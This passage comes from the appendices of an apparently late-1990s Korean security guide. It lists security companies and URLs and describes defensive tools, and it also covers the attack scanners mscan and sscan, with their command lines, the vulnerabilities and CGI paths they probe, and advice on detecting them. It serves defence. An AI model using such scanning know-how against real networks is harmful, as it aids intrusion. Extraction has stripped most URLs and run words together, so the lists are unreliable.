co.kr 삼양데이타시스템 ( 서울시종로구연지동 주 ) 삼양빌딩 6층 r

221 회원사 주소 전화번호 팩스번호 홈페이지 소프트포럼 서울시영등포구여의도동 33번지한국증권거래소 kr 신관12층 시큐어리티다이나믹서울시강남구삼성동 159 스한국종합무역센터 27층 싸이버텍홀딩스 서울시영등포구여의도동 신한빌딩 3층 r 씨그마테크 서울시강남구역삼동 삼성제일빌딩 1515 kr 아이티웍스 서울시서초구서초동 송남빌딩 6층 서울시강남구역삼동 746번지어울림정보기술 ( 주 ) PMK빌딩 6층 주식회사데시콤 주식회사드림시큐리티 주식회사링크웨어 컨텐츠코리아 ( 인포머셜컨설팅 ) 코스넷정보통신 티디아이코리아 ( 주 ) 펜타시큐리티시스템 포스데이타주식회사 프롬투정보통신 ( 주 ) 플러스기술 ( 주 ) 한국썬마이크로시스템즈 ( 주 ) 한국노벨 ( 주 ) 한국사이버페이먼트 한국정보공학 ( 주 ) 서울시강남구역삼동 거암빌딩 11층 r 서울시성북구성북2동 y.com 서울시서대문구서대문우체국사서함 119호서울시영등포구영등포동 2가 서울시강남구역삼동 선영빌딩서울시서초구서초3동 성진빌딩 301호서울시영등포구여의도동 23-3 하나증권빌딩 16층경기도성남시분당구서현동 대전시유성구어은동 1 ETRI 창업지원센터 4114호서울시서초구서초동 소프트웨어벤처프라자 5층서울시강남구삼성동 덕명빌딩서울시강남구대치동 미래와사람 B/D 11층서울시종로구당주동 5번지로얄빌딩 9층서울시서초구양재동 3-15 한국전지빌딩 3층 r r r (042) (042) r m 한국후지쯔주식회사서울시영등포구여의도동 현승정보기술주식회서울시서초구방배동 사톱스타빌딩 4층 회산정보기술주식회서울시강남구삼성동 사서정빌딩 6층

222 부록 E. 국내외정보보호관련 URL 목록 E1. 국내 URL E2. 국외 URL

223 부록 E. 국내외정보보호관련 URL 목록 E1. 국내 URL 공공연구기관및산하기관 Site 한국정보보호센터 ( CERTCC-KR(Korea CERT Coordination Center) : ( 요약정보보호의최신동향 / 기술 / 평가 / 인증, 기술봉사반, CERTCC-KR 연결등. 한국정보통신망침해사고대응지원팀 : 국내전산망해킹및침해사고방지및예방, 사고접수및처리, 피해복구지원, 관련자료제공 전산망표준화연구, 전산망보안기술연구및인한국전산원 / 정보통신망보안실터넷유해정보차단도구개발, 국가지리정보체계 ( (NGIS) 표준화연구, 지능형교통정보시스템 tml) (ITS) 표준화연구등 한국전산원보안기술표준팀 ( KRIA/IRF(Incident Response Forum): ISP침해사고공동대응포럼 ( 중앙수사부정보범죄대책본부 ( 공공전산망의보안을목적으로보안기술표준및지침개발팀. 유해정보차단도구 'NCApatrol', 자동화위험분석도구 'HAWK', 인터넷방화벽 국내전산망보안및보안정책수립, 전산망상호간또는전산망보안그룹간의보안정보교류및조정역할, 국내외인터넷보안활동의창구역할 주요법령, 컴퓨터범죄, 신고등정보범죄에관련된정보와관련인터넷사이트를연결. 학회및협회 Site 요약국내정보보호학분야의학문발전과정보보호학의한국통신정보보호학회발전과정보및통신기술의통합된정보보호기술 ( 개발목적으로세미나및학술대회개최정보통신윤리위원회불건전정보유통의억제와건전한정보통신문화를 ( 확립하기위한활동을하는정부기관. S/W 저작권자보호를위한컴퓨터프로그램등록, S/W 저작권분쟁조정을위한프로그램분쟁조정, 컴퓨터프로그램보호회 S/W 이용촉진및관련산업의발전을위한저작권 ( 위탁관리, S/W 유통질서확립을위한불법복제단속등 S/W 저작권업무를총괄, S/W 지적재산권과관련한모든정보를검색가능한국정보통신망침해사고대응팀협의회 (CONCERT) 한국정보보호산업협회

224 대학전문연구실 Site 성균관대학교 ( 침입차단및탐지연구회 ) 경북대학교통신시스템연구실 ( 요약 IC 카드, 초고속통신망보안, 암호알고리즘분야연구, 연구결과및수행프로젝트소개, 암호학관련자료수록. 순천향대학교정보보호연구실 CA 인증발급및검색서비스수록. ( 컴퓨터이론및암호연구실 ( 포항공대 I.S.T Lab(Information Security & Telecommunications Lab) 담당교수및대학원 / 학부학생소개, 주요출판물, 세미나안내및연구분야소개. 스마트카드를이용한각종정보보안기술개발. 정보보호를위한프로토콜및기반이론연구. 기타관련사이트 Site 요약이정남의가제트형사고향진안정보, 인터폴, 해커수사대소개, 및수사 ( 뒷얘기, 형법과컴퓨터범죄자료. 장미디어에서운영하는암호화기술및구조개 JMI 암호화연구소발연구소로서인증서발급안내, 개발프로그램 ( 다운로드및문서자료수록. C.o.M.a ( 네트워크보안, 운영체제및프로그램, 프로토콜의취약성, 버그리포트및관계소식, 관련정책및기술을공유하기위한곳으로관련정보와게 WHITE Security Team 한남대학교보안모임, 시큐리티프로그램, 보안문 ( 서등해킹및보안관련자료제공. 김대현의인터넷보안과해킹유닉스와인터넷의보안관련자료와취약성진 ( 단및분석도구설계자료수록, 관련사이트링윤영태의보안사이트각종보안, 방화벽, 보안도구에대한문서와해 ( 킹프로그램제공, 시스템관리를위한리소스수. 김휘강의 Practically Useful Unix 유닉스의컴퓨터보안관련강좌와심각한보안 Secure Administration 강좌상의버그를 OS 별로나누어수록, 컴퓨터보안 ( 관련컨퍼런스회의자료제공. Security_document/) 박창민 - 인터넷, 전산망보안 ( 인터넷, 전산망보안및 Unix, 윈도우즈 NT 시스템및네트워크관리강좌수록, 최근 Security 동향및추천사이트링크

225 E2. 국외 URL Security News Site Address Computer Professionals for Social Responsibility ( Firewalls.R.Us ( RSA Data Security ( Information Security News ( Info Security News ( Cipher-Electronic Newsletter of the Technical Committee on ( Security & Privacy Netsurfer Focus ( Security Archives, Servers & Indicies -Comprehensive Sites Site Address COAST Archive ( NIST Computer Security Resource Clearinghouse ( NRL's High Assurance Computing Systems ( Security Reference Index ( EINet's Security Page ( chnology Comprehensive page at NIH ( Hotlist by Bennet Yee ( ww/sec. Directory at Yahoo ( curity_ Security (Computer Technology) ( chnology CIAC Web Site ( NRL ADP Security ( Security for Businesses on the ( U. Pennsylvania - Information Security and Privacy ( AuditNet (

226 Site EFF Crypto/Privacy/Security Sirene Pointers Idaho State's Security Library A general index at CNS (Luxembourg) Szymon Sokol's security page SIMS Security Network/Computer Security Technology Unix Net for Computer security in Law Enforcement CNS - Network Security Pages RFC Index Computer Security Chalmers funet.fi ftp archive Tiamat's lair (a different spin on this hotlist) "Unix Guru Universe" Computer Security Security Resource Net - Computer Security The Irish Computer Security RST Reliability Hotlist Anonymous FTP abuses STEL - A secure telnet A-Z Cryptology Directory of Scholarly and Professional E-Conferences The Solaris Security FAQ Address ( ( kte/sirene/pointers_complete.html) ( ( curity-home.html) ( ( ( vel.html) ( ( curity-home.html) ( ( rlinks/security.html) ( ( ( ( ( ( ( ( ( ( to.html) ( ( ty-faq.html) Crypto-Log: Internet Guide to Cryptography ( Kim-Spy Archive ( PVEP-Security Archive ( Quadralay Cryptography Archive (

227 Site Address The Great Big Privacy Page ( Mega Security Links ( Intelligence on the Web ( Loyola Homepage on Strategic Intelligence ( The National Security Archive ( Security UK ( National Institutes of Health Computer Security Information ( Electronic Frontier Foundation Security Archive ( isc/computer_security/) MITRE Information Security Technical Center Info ( nfosec.html) The Collection of Computer Science Bibliographies ( Virtual World of Spies and Intelligence ( Global Technology Research's Information Security Archive ( FACTNet Library and Archives ( New Zealand Security Industry Association ( SGI: The Information Vault ( List of sites to report ( Sunword security links ( Related network security stories ( from SunWorld Online's Site Also check out the Site Index for stories on Web server ( Computer Security Resource Clearinghouse ( IBM Computer Security Links ( Matt's Unix Security Page ( FORMIS VIRTUAL ARCHIVE ( Security Page ( BugNet ( Cyphernet ( Secure Data Networks ( Gateway to Information Security ( Interesting Security Links ( Computer and Internet Security ( Resources Harvard Information Infrastructure Project Policy (

228 -Tools Site Address COAST Archive ( Unix System Monitoring Tools ( Doug's tools page ( Internet Locations for Materials ( on the Disks for Applied ed_cryptography.html) Klaxon (a port monitoring tool) ( Rscan Homepage ( Netpassword - changing ( passwords safely across the net sword-paper/paper.html) The Kerberos Network Authentication Service ( The Sesame Distributed Authentication System ( Security tools at Dartmouth (Matt Bishop) ( System administration tools ( funet.fi ftp archive ( Wietse Venema's collection of tools and papers (ttp://ftp.win.tue.nl/pub/security/index.html) Frank O'Dwyer's Homepage - Security Code ( Ssh (Secure Shell) Home Page ( osh, Operator Shell, Distributes Privileges Under UNIX ( Satan Homepage ( Unix Host and Network Security Tools ( DCE Homepage ( Far Out! Computer Security ( Michael Sobirey's Intrusion Detection Systems page ( ds.html) AVP Virus Encyclopedia ( Word Lists (ftp://ftp.funet.fi/pub/unix/security/dictionaries/) Dictionaries from Oxford (ftp://ftp.ox.ac.uk/pub/wordlists/) password-checking (ftp://ftp.ifi.uio.no/pub/passwdd-1.2.tar.gz) securelib (ftp://eecs.nwu.edu/pub/securelib.tar) sfingerd, Logging fingerd, and other tools (ftp://hplyot.obspm.fr/net/) xinetd, a replacement for inetd (ftp://ftp.telebase.com/pub/security/) DFN CERT Too1s Archive (ftp://ftp.cert..dfn.de/pub/tools/)

229 Site Argus 1.5, a generic IP transaction auditing tool ARP Watcher the NETMAN family of swatch, simple log watcher TCP Port Prober tcpdump passive-ftp, FTP client that doesn't establish TCP SFS, Secure File System Netpipes Asmodeus Janus, A Secure Environment for Untrusted Helper The Offline Utility to Change NT Passwords Joe's Generic SUID/SGID Ballista Linux chkexploit IP logger for Linux Address (ftp://ftp.sei.cmu.edu/pub/argus-1.5/) (ftp://ftp.ee.lbl.gov/arpwatch.tar.z) (ftp://ftp.cs.curtin.edu.au/pub/netman/) (ftp://sierra.stanford.edu/pub/sources/swatch.tar.z) (ftp://ftp.cs.yale.edu/pub/long/src/network/security/) (ftp://ftp.ee.lbl.gov/tcpdump.tar.z) (ftp://ftp.cisco.com/pub/passive-ftp.tar.z) (ftp://ftp.informatik.uni-hamburg.de/pub/virus/cypt/ ( ( ( ( ( ( (ftp://ftp.pangeia.com.br/pub/seg/pac/) (ftp://ftp.tu-graz.ac.at/pub/linux/redhat-contrib/srp MS/iplogger src.rpm) Encryption Programs & Resources Site Address Pretty Good Privacy ( Secure Transaction Solutions ( McAfee's PCCrypto ( QuickEncrypt for Macintosh ( PrivaSoft ( SECURE encryption (Eudora) ( VeriSign ( RSA Data Security ( Encryption Policy Resource Page ( Electronic frontier Foundation What's HOT in Encryption Page ( L/hot.html) The Cryptography Project ( Trusted Information Systems (

230 NT Securit Site Windows NT Password Recovery Service Windows NT Security Issues NT Web Server - Security Issues Kane Security Analyst for Windows NT NT and C2 security NT WEB Server security Netscape on NT security The NT Shop, NT Security Homepage RPC bug in Windows NT Attack and Defense related details of NetBIOS and CIFS resource-sharing networks Address ( ( ( ( ( m) ( m) ( yper95/0518.html) ( (ftp://ftp.microsoft.com/bussys/winnt-public/) ( NT bug exploit (ftp://ftp.org.com/pub/examples/windows/win95.update/ntf sdos.zip) Windows 95 and MSIE Security Hole ( PC Week: NT Vulnerable to Attack on CPU ( http - DOS CGI Configuration ( MS Internet Explorer authentication ( NT Exploits ( SAM Attack on Windows NT ( The NT Shop Homepage ( Windows NT Password Dump Utility (ftp://samba.anu.edu.au/pub/samba/pwdump) NTBUGTRAQ site ( FAQ on attacks on NT password hashes ( NTSecurity.net ( NTSecurity.com ( Somarsoft. Inc. ( NT Research ( NT Exploits Page ( NT Internals ( On NT Password Security ( Microsoft To Post NT Security Fixes ( MyDesktop Network ( FAQ: NT Cryptographic Password Attacks & Defences ( NT Security FAQ ( Microsoft NT Policies White Paper ( Microsoft NT5.0 white papers (some security info) (

231 Journals, Newsletters and Mailing Lists Site INFO SECURITY NEWS Cipher - Electronic Newsletter of the Technical Committee on Security & Privacy Netsurfer Focus Secure News COAST Newsletter ("CoastWatch") The PRIVACY Forum IEEE-CS TC on Security and Privacy Cipher newsletter Computer Underground Digest WWW Site NetWatchers Front Page The RISKS Forum Firewalls mailing list Sneakers-Internet Wide Area "Tiger Teamers" mailing list. Virtual Library Mailing List Archive (includes bugtraq and firewalls lists) Journal of Computer Security Disaster Recovery Journal 6 Computer and Communications Security Reviews Infosecurity News - Introductory Home Page Computers Security The Virus Bulletin www-security mailing list SunWorld Online The Crypt Newsletter WWW Homepage Crypt Newsletter Papers published by Reliable Software Technologies Security Digest The Scout Report Homepage Legion of Lame Home Page The Red Rock Eater OFFSHORE, an ejournal Microsoft Crypto API Mailing list Address ( ( ( ( ( ( ( ( ( ( ( ( long-morrow/sneakers.html) ( ibrary/mail/) ( ( ( ( ( ( ( /index.html) ( ( ( ( ( ( ( ( ( (

232 Site Address The Red Rock Eater ( A definition of the word hacker, ( and some associated links. IBM's Other Voices ( Cryptolgia - A quarterly journal ( devoted to all aspects of tolo/index.htm) cryptology The Journal of Infrastructural Warfare ( The Journal for Internet Banking and Commerce ( Journal of Systems and Software ( Journal of American Underground Computing (ftp://etext.archive.umich.edu/pub/zines/jauc/) Cypherpunks Mailing List ( /) International Journal of Forensic ( Computing Secure News ( ISS Comprehensive Security Mailing Lists ( Journal of Internet Security ( FAQ Site Address Frequently Asked Questions (FAQ) ( PGP FAQ, Buglist, Fixes, ( and Improvements ml) Usenet security FAQs ( ter-security/) The WWW Security FAQ ( curity-faq.html) Ssh (Secure Shell) FAQ ( Java Security: Frequently Asked Questions ( Win 95 Net Networking FAQ ( s/archives/) List of security FAQs ( DCE FAQ ( y.html) VIRUS-L FAQ ( List of Virus FAQs ( Cybertek/Modern Survivor FAQ (

233 부록 F. 정보보호관련공개 S/W 현황 F1. Packet Filtering & 접근제어도구 F2. 보안취약점 Scanner F3. Scanning 역탐지도구 F4. 네트웍모니터링도구 F5. 시스템내부취약점점검도구 F6. 패스워드 & 인증관련보안도구 F7. 암호화체크섬 (Checksum) 도구 F8. 보안강화용대체프로그램 F9. Windows95/NT 보안도구

234 부록 F. 정보보호관련공개 S/W 현황 F1. Packet Filtering & 접근제어도구 보안도구명 : TCP Wrappers, by Wietse Venema 입수처 : 주요기능 : ㆍ호스트의 tftp, exec, ftp, rsh, telnet, rlogin, finger, 및 systat 포트에접근하는대상의감시및제어기능을제공ㆍ다른프로그램들도같은방식으로제어되고감시될수있도록하기위한라이브러리가제공됨ㆍ TCP Wrapper는접속요구를한출처와목적지에기반한몇가지수준의접근제어와성공하거나실패한접속기록을제공한다. tcp wrapper는요구한실제서버프로세스를시작하기전에필터프로그램을시작한다. 실제서버프로세스는접속요구가접근제어목록에의해허가된다음에실행된다. 접속과접속시도에관한모든메시지는 syslogd를통해기록된다. ㆍ모든규칙은 hosts.allow와 hosts.deny 두개의설정파일에의해적용된다. ㆍ tcp wrapper는 inetd.conf를수정하여몇가지서비스를대신하도록설정되어있다. 이런서비스들에대한접속은모두기록되며, 접근제어가적용된다. tcpd는 hosts.allow나 hosts.deny 파일안의규칙에지정된서비스만을보호한다. 그외다른서비스들은 "ALL" 을사용하여보호된다. inetd.conf 안에서 tcpd가호출되면규칙의유무에상관없이모든접속이기록된다. ㆍ IP spoofing의위험성접근제어와기록은 IP 프로토콜의 IP 주소를기반으로이루어진다. 그러나특정한환경에서는 IP 주소를속일수도있으며, 이는침입자가접근권한을얻을수있는가능성을주게된다. tcp wrapper는약점을줄이기위해두번의 DNS 탐색을행함으로서이런방식의공격을탐지하려고한다 : 즉, 연결을요구한 IP주소에대한호스트명을찾아보고, 다시해당호스트명에대해 IP 주소를찾아본다. 그결과얻어낸 IP주소가원래의주소와일치하지않는다면, 접속은거부된다. 이모드는 "PARANOIDE" 라부르며컴파일할때꺼놓을수있다. (DNS를통해서원래의주소로호스트명을얻을수없다면적법한호스트였을지라도접속은거부된다. 이것은 reverse 탐색이제공되지않는사이트에특히영향을미칠수있다.) 부연하자면, 접속을제한하려는모든주소는 IP주소로기술되어야한다. 호스트명은접속을제한하려는곳을 IP주소로는표현할수없을때만사용해야한다

235 ㆍ설정사항을보호하기설정파일은시스템에저장되므로조작될가능성이있다. 그러므로이런파일들의관리용복사본을만들어서물리적으로쓰기금지된매체에옮겨서보관할필요가있다. 그리고나서 Tripwire와같은결함검사도구중하나를사용해서이런설정파일들을검사해볼필요가있다. 보안도구명 : SOCKS Library, SOCKD 입수처 : ftp://ftp.cert.dfn.de/pub/tools/net/socks/ 주요기능ㆍ Sockd와 SOCKS 라이브러리는 TCP Wrapper의일종으로, 시스템을안전하게하는데목적을두기보다는모든외부의인터넷서비스를집중시키기위한도구이다. ㆍ실제의보안도구가아니라, 보안도구들을도와주는라이브러리이다. 이들은커널에서의시스템콜이나기타라이브러리들을약간수정하여좀더보안이잘유지될수있도록도와준다. ㆍ어떤네트웍서비스든지연결이요구되면 inetd에의하여수행이시작되며, 특정한호스트만연결을허락하는것도가능하다. sockd도마찬가지로모든연결상태를저장시키도록한다. 하지만이도구는클라이언트프로그램들의소스를가지고있어야하며이용하기가까다로운점이있다. ㆍ인터넷 " 소켓서버 " 로서편리하고안전한연결을침입차단시스템을통해제공함ㆍ단순한프로토콜을통해상호작용하는클라이언트라이브러리루틴과대몬 (Daemon) 으로구성됨 보안도구명 : ipfirewall 입수처 : ftp://ftp.cert.dfn.de/pub/tools/net/packet_screen/ipfirewall 주요기능 : ㆍ IP 패킷필터링과스크리닝도구ㆍ방화벽섹션은패킷필터링을수행할수있도록해주며, IP어카운팅섹션은방화벽섹션과비슷한규칙에의해라우터의사용처를추적할수있도록해준다. 예를들면어떤기계에서얼마나많은양을라우터가받고있는지, 웹 packet은얼마나전달하고있는지알수있게해준다. 보안도구명 : TIS Firewall Tool Kit 지원시스템 : BSD Unix 기반의시스템입수처 : 주요기능ㆍ인터넷침입차단시스템구축용소프트웨어키트ㆍ전체모듈의 C 소스코드로제공됨

236 ㆍ상용 firewall제품인 Gauntlet을판매하고있는 TIS 사에서공개용으로내놓고있는 Firewall이다. ㆍ관리용툴이 Text Base의 Command Line 형식으로되어있다. 따라서 Unix나네트웍, 라우터의 Access Control List 조작등에일정수준이상의지식을가지고있어야사용할수있다. 보안도구명 : tcpr 입수처 : 주요기능ㆍ방화벽을통하여나가는 Telnet과 FTP에투명성있는프락시기능을제공하는툴ㆍ inetd 형식의서버, 릴레이프로그램, 및클라이언트로구성됨ㆍ perl 스크립트로작성됨 보안도구명 : screend, by Jeff Mogul 입수처 : ftp://ftp.vix.com/pub/vixie/ 주요기능 : ㆍ제공된 daemon과수정된 kernel을이용하여모든패킷에대한필터링기능제공ㆍ필터링은근원주소, 목적주소, 또는패킷내의임의의바이트또는바이트의집합에따라실행됨ㆍ커널의수정이필요함 보안도구명 : xinetd 입수처 : 주요기능 : ㆍ인터넷서비스 daemon인 inetd를대체하여원격호스트의주소및접속시각에의한접근제어를지원함ㆍ서버시작시각, 원격호스트주소, 원격사용자이름, 서버실행시간, 및요청된동작등에대한로깅을제공ㆍ접근제어, TCP와 UDP 프로토콜을지원의기능이있으며, ㆍ각서비스를담당하는서버의수를제한, fork할수있는프로세스의수제한, 프로세스가만들수있는기록파일의크기제한등의기능에의하여접근에제한을둘수있다. ㆍ서버인자의수에제한이없다. ㆍ재설정 (reconfiguration) 하기가힘들다. ㆍ xinetd는 inetd에서사용하는 configuration파일과는다른형태의파일을사용하는데, inetd.conf를 xinetd.conf로바꾸어주는 itox 프로그램을이용하여바꿀수있다. 그방법은다음과같다. # itox [-daemon_dir dir_name] < inetd.conf > xinetd.conf 만약자신의시스템에서 tcpd를사용하고있다면 -daemon_dir 옵션은 tcpd가이 xinetd 를찾을수있도록해준다

237 보안도구명 : DrawBridge by TAMU 입수처 : 주요기능ㆍ Drawbridge는두개의이더넷카드를가진 PC에서네트웍 packet을 filtering하는도구 보안도구명 : sf 지원시스템 : 리눅스입수처 : ftp://ftp.switch.ch/software/sources/network/sf 주요기능ㆍ리눅스시스템용 TCP/IP 패킷필터링도구 보안도구명 : spammerjammer 입수처 : 주요기능 : ㆍ스팸메일에대해필터링을하여차단함ㆍ각각의스팸메일에나타나는특정단어를이용하여필터링 보안도구명 : wwwblock 지원시스템 : SunOS 4.1.* and Solaris 2.*. 입수처 : 주요기능 : ㆍ access 리스트를이용하여특정포트별로서버에의접근제한 보안도구명 : CGI-Wrap 지원시스템 : 대부분의웹서버입수처 : ftp://ftp.cc.umr.edu/pub/cgi/cgiwrap/ 주요기능 : ㆍ사용자의 CGI 프로그램에의접근에대한보안강화 보안도구명 : traceroute, by Van Jacobson 입수처 : ftp://ftp.ee.lbl.gov/traceroute.tar.z 주요기능 : ㆍ목적지에이르는경로상의라우트 IP 패킷추적 보안도구명 : gated, by Cornell University 입수처 : ftp://gated.cornell.edu/pub/gated/ 주요기능 : ㆍ네트워크라우팅 daemon으로서 BGP, EGP, RIP, RIP II, OSPF, 및 HELLO 프로토콜을지원함

238 ㆍ대부분의 UNIX 시스템에서제공되는 routed 프로그램에비해유연하여침입차단시스템구축시또는라우팅정보의공개및접수제한시에유리함 보안도구명 : Gateway 접근 Utilities 입수처 : ftp://coast.cs.purdue.edu/pub/tools/unix/firewall/gau.tar.z 주요기능 : ㆍ침입차단시스템호스트에계정이없어도네트워크침입차단시스템을통해인터넷에접근을가능하게해줌ㆍ프록시형식으로동작하는수정된 FTP 및 TELNET 프로그램 보안도구명 : udprelay 입수처 : ftp://coast.cs.purdue.edu/pub/tools/unix/ 주요기능ㆍ침입차단시스템을통해 UDP 패킷을전달해줌ㆍ침입차단시스템호스트에서수행되는디먼프로세스임 보안도구명 : xforward 입수처 : ftp://crl.dec.com/pub/dec/ 주요기능ㆍ네트워크침입차단시스템을통해 X 윈도우시스템연결을제공함 F2. 보안취약점 Scanner 보안도구명 : Nessus 지원시스템 : UNIX, WindowsNT 입수처 : 주요기능 : ㆍ보안스캐너로네트워크상의취약점을점검해줌ㆍ 157가지이상의취약점점검ㆍ GUI 제공 보안도구명 : ISS (Internet Scanner SAFEsuite) 지원시스템 : Windows NT, IBM AIX, HP-UX, SunOS, Solaris, Linux 입수처 : 주요기능 : ㆍ ISS는 multi-1evel security scanner로서사용자나관리자의실수로잘못설정된중요설정파일들을조사하여그이상여부를알려준다. 이 ISS는자신의계정이없는다른시스템의보안을조사하는데목적이있는것이아니라, 자신의시스템이자신의시스템에계정이없는사람으로부터의공격을막을수있도록도와주는데그목적이있다

239 ㆍ Internet Scanner의후속버전ㆍ guest, bbs, lp 등과같은필요없는계정의유무, 각종프로그램의알려진버그들, export된파일들의제한사항 (access-control) 등을조사하여보안취약점을발견, 수정하고수정사항의유지를지속감시할수있는피드백루프구축ㆍ웹, 침입차단시스템, 인트라넷, 시스템에대한보안평가툴을제공함ㆍ웹사이트, 침입차단시스템, 워크스테이션, UNIX, Windows NT 및 Windows 95 서버점검가능ㆍ mscan이나 sscan등의최신스캔도구들에비해다소오래된취약점만을체크하기때문에최근에는그다지많이사용되지않는다. 보안도구명 : SATAN(System Administrator Tool for Analyzing Networks), 입수처 : 주요기능 : ㆍ원격시스템의취약점을분석하는도구로서 mscan과 sscan의등장이전에해킹공격에많이사용되는도구였으나, 현재는오래되어효과가없는취약점을점검하기때문에최신해킹공격을사용하기에는부족한점이있다. 때문에최근에는 mscan이나 sscan과같은최신보안취약점을광범위하게스캔할수있는스캔도구들을주로이용하는경향을띠고있다. ㆍ SATAN은네트웍을통하여리모트시스템의보안정도를조사하고그자료를데이터베이스에저장한다. 이결과를 http 프로토콜을지원하는 HTML browser를통하여쉽게볼수있는그래픽사용자인터페이스를제공한다. 또한호스트의타입, 서비스, vulnerability등의보고서를만들어낼수도있다. 보통기본으로 SATAN의실행은설정파일 (config/satan.cf) 에의하여제어될수있다. ㆍ인터넷의서브도메인을체계적으로옮겨다니며응답하는각시스템의취약점을분석함ㆍ공개용 ISS에비해강력한기능을제공ㆍ취약점및조치방법에대한 hyperlink방식에의한상세한설명제공ㆍ검사대상으로서개별기계또는도메인을지정할수있음ㆍ검사의심도를 Light, Normal, Heavy로지정가능ㆍ확장성및적응성이뛰어남ㆍ SATAN으로체크할수있는취약점들은다음과같다. FTP vulnerabilities 권한이주어지지않은 NFS 파일시스템 export(access-control을검사 ) portmap을통한 NFS의 export( 현재 export되어서사용중인호스트검사 ) NIS의패스워드파일접근 REXD 액세스 Sendmail vulnerabilities

240 TFTP의파일접근 r-shell의접근제한이없는 X 서버로의접근제한받지않은모뎀쓰기권한이있는 FTP의홈디렉토리 보안도구명 : MSCAN 개요 : mscan은 월 jsbach라는해커가만든취약점스캐닝도구로서이프로그램은네트워크의블록전체를스캐닝하여그블록내에있는시스템들에대해여러종류의취약점을한번에스캐닝할수있다. 이러한특성때문에외국에서국내도메인전체 (Ex: ac.kr) 에대한광범위한스캐닝이최근빈번해지고있다. 기능및특징 : mscan은네임서비스를이용하여.test.com, 등네트워크블록전체를스캐닝하여사용되고있는 IP주소를찾아내어그내용을파일에저장하여이용하는데, 이때기본적으로저장되는파일이름은 ".ipdb" 라는파일이다. 일단공격대상네트워크에대한스캐닝이이루어지면, 이를이용하여그네트워크내에있는시스템들에대해취약점을스캐닝한다. mscan이스캐닝하는취약점들은다음과같다. wingate, phf, handler, test-cgi, NFS exports, statd, named, X server, ipopd, imapd mscan은우선대상시스템에 telnet 접속을맺어그시스템의 OS를알아낸후취약점들에대한스캐닝을하여그결과를보여준다. 실행방법 : $ mscan -r b > og MSCAN 공격탐지및대책 : 가. 웹서버로그 mscan은웹서버의 cgi-bin에있는 phf, test-cgi, handler라는 cgi프로그램의존재유무를스캐닝한다. 이러한 cgi 프로그램들은 Apache 웹서버를설치할때기본적으로설치되는데, 이들은시스템의공격에사용될수있는취약점을가지고있기때문에삭제하거나패치를적용해야한다. 나. 메일로그시스템에서 ipop나 imap 서비스가제공되고있는지를스캐닝한다. ipop과 imap에는버퍼오버플로우취약점이존재하므로공격자는이를이용하여관리자 (root) 권한을얻을수있다. 이러한프로그램들은최신버전으로패치하거나 tcpwrapper와라우터를이용한접근제어를사용한다. 특히 imap은해킹툴을사용하여쉽게관리자 (root) 권한을획득할수있으므로꼭필요하지않다면 inetd.conf 파일에서주석처리를하여서비스를제공하지않도록한다. 다. tcpdump 로그 tcpdump 로그를보면네임서비스에대한요청이엄청나게증가했음을볼수있으며, 그외에취약점스캐닝을위한패킷정보가나타나있음을볼수있다

241 mscan 공격이인터넷상에서이루어질때에네트워크에상당히많은부하를줄수있음을알수있으며, 특히네임서버에대한부하가크다. 라. 기타로그해당서비스에대한스캐닝을당했음으로짐작되는로그들이같은시간대에연속적으로반복되어나타나게된다. 보안도구명 : SSCAN 개요 : sscan은지난 '98년 6월 mscan을개발하여전세계를떠들썩하게한 johann sebastian bach가개발한보안취약점스캐닝도구로 '99년 1월에버전 0.1을발표하였다. sscan은 mscan의명성 (?) 으로인해발표된지얼마되지않아서많은공개사이트에서소개되고있으며미국CERT 팀에서도그위험성을경고하고있다. 현재발생하고있는해킹사고에서가장많이사용되고있는도구중의하나이다. 기능 : sscan은지난 '98년에개발된 mscan에비해네트워크보안취약점점검기능이매우강력해져최근에발표되고있는많은수의보안취약점들을점검한다. 또한유닉스시스템뿐만아니라윈도우즈 95/98, 윈도우즈NT 시스템의보안취약점도점검하여지난 '98년에윈도우즈시스템에많은위협을가하였던백오리피스에대해서도진단을한다. sscan 자체가취약점을공격하지는않지만취약점을공격할수있는명령어들의모음인공격스크립트를수행하도록설정할수도있다. 따라서 sscan 취약점스캐닝과함께공격목표시스템에대하여보안취약점을이용한공격이가능하게된다. sscan과함께보급된문서에는 sscan에의해알려진취약점을이용하여공격하는방법과자기복제가가능한예제스크립트를소개하고있다. sscan의점검항목을 mscan과비교하면다음과같다

242 점검항목 mscan sscan 비고 운영체제버전확인 네트워크포트스캐닝 QPOP root 버퍼오버플로우 IMAP root 버퍼오버플로우 Sendmail EXPN solaris x86 listen/nlps_serv 원격 root 버퍼오버플로우 리눅스 msql2.0 원격스택오버플로우 리눅스 bind/iquery 버퍼오버플로우 취약한 CGI 점검 /cgi-bin/phf /cgi-bin/count.cgi /cgi-bin/test-cgi /cgi-bin/php.cgi /cgi-bin/handler /cgi-bin/webgais /cgi-bin/websendmail /cgi-bin/webdist.cgi /cgi-bin/faxsurvery /cgi-bin/htmlscript /cgi-bin/pfdisplay.cgi /cgi-bin/perl.exe /cgi-bin/wwwboard.pl 윈도우즈시스템의백오리피스 (31337포트점검) NFS 취약점 - export 목록 - 모든사용자에읽기 / 쓰기가능여부 리눅스 mountd 원격버퍼오버플로우 statd 버퍼오버플로우 solaris NIS 서비스 (rpc.nisd) 원격오버플로우 solaris nlockmgr 원격오버플로우 X11점검 - X 출력화면덤프, 스니핑가능성 Wingate 동작유무 FINGER 점검 - 사용자확인 (default : root, guest) - 한번도로그인하지않은사용자확인 스크립트모듈수행 named IRIX default 계정유무 사용방법 : mscan에비해기능이막강해진데반해사용방법은대단히단순해졌으며, 점검결과도시스템의취약점을쉽게파악할수있도록잘정리되어있다. 또한 mscan에서명령어라인에서주어야했던옵션들을환경설정파일 (Sscan.conf) 에두어특별한옵션이필요없이사용가능하다. 가. 옵션설명명령어라인에서다음과같은옵션이사용되어질수있다. $ sscan (-o hostname -s) (-c configfile) (-v) -c <config> : 디폴트환경설정파일인 Sscan.conf를대신할특정환경설정파일설정

